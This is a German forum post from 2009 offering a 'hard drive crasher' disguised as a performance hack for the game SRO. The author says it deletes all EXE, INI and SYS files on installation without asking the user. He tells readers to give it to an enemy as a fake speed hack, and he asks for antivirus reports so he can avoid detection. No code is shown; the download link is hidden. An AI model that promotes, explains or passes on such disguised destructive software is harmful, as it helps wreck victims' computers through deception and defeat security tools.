myGully.com Boerse.SH - BOERSE.AM - BOERSE.IO - BOERSE.IM Boerse.BZ .TO Nachfolger
Zurück   myGully.com > Computer & Technik > Sicherheit & Anonymität
Seite neu laden

SRO - Faked Harddrive Crasher by X-Zat

Willkommen

myGully

Links

Forum

Themen-Optionen Ansicht
Prev Vorheriger Beitrag   Nächster Beitrag Next
Ungelesen 20.07.09, 00:19   #1
X-Zat [Low]
Unfreiwilliges Genie ;)

Benutzerbild von X-Zat [Low]

Bedankt: 1
X-Zat [Low] ist noch neu hier! | 0 Respekt Punkte
Standard SRO - Faked Harddrive Crasher by X-Zat

Hey, Leute.

Nachdem ich den Thread über einen PW-Stealer hier gelesen hab, der nicht mal clean ist, biete ich euch das hier an:

SRO - Performance Hack! By X-Zat Files

Kurzüberblick, Features:

1. Professionelles Design
2. Nach Installation DIREKTES löschen aller *.EXE, *.INI und *.SYS
3. Folglich ein theoretischer Crash von Windows, oder Festplatte nicht mehr nutzbar

Eigenschaften:

1. Größe: 10,1 MB (eigentich ~1MB, habs mit Stuff zugepackt, damit glaubwürdig ).
2. Wird nicht erkannt, da simples BAT-Programm, bzw. Bat-Ausführung.
3. Direktes Ausführen der *.EXE meines kleinen Programmes (BAT TO EXE CONVERTED, Icon included)
4. Muss unter Vista nicht als Adminstator ausgeführt werden, gelöscht wird ohne Frage des Users!
5. Ungefährlich im nicht installierten Zustand. Setup kann ohne Risiken entpackt und gespeichert werden, NICHT AUSFÜHREN!

Wie man es benutzt:

1. Deinem "schlimmsten Feind" einfach den Download-Link geben und sagen es sei ein Performance-/Geschwindigkeits-Hack von SRO.
2. Ihn Installieren lassen.
3. Fertig - Jetzt kommt die Schadenfreude

Download-Link:

Rapidshare: [ Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ] (Danke fürs Uppen an BadFriend!)

- Benutzung auf eigene Gefahr - Seid bitte nicht so dämlich, es bei euch zu installieren! In der *.RAR ist das Tool ungefährlich. -

MfG und viel Spaß mit euren Rivalen,

X-Zat

EDIT: Nein, es ist kein PW-Stealer oder dergleichen - Ich kann solche Assis, die etwas infiziertes uppen ebenso wenig leiden, wie ihr es tut! -. Wie gesagt ungefährlich im NICHT INSTALLIERTEN Zustand. Wenn euer Antiviren Programm trotzdem etwas melden sollte, bitte SOFORT melden, damit ich das behebn und verbessern kann!